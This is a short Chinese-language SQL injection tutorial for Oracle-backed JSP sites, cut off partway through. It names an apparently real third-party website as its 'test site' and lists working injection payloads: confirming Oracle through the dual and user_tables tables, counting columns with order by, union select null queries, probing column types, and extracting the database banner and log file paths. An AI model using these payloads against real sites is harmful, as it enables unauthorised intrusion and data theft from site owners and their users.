一、Oracle注入详解:
与Oracle数据库搭配:
脚本语言asp,aspx,jsp
web服务器:tomcat
测试站点:http://www.e-hifarms.com/yellowpage/detail.jsp?id=111
1、判断注入
略
2、判断oracle数据库:
id=1 and exists(select * from dual)
id=1 and exists(select * from user_tables)
以上是oracle特有的表
3、查询
获取列数:order by
联合查询:union select null,null,null,null from dual
与其他数据库不同,不可直接用数字,改用null
爆非数字类型列:
union select 1,null,null,null from dual
若报错该列为非数字类型列
union select 'null',null,null,null from dual
若报错该列为非字符类型列
4、获取信息
1、获取数据库版本:
(select banner from sys.v_$version where rownum=1)
2、获取操作系统版本:
(select member from v$logfile where rownum=1)
3、获取当前用户&#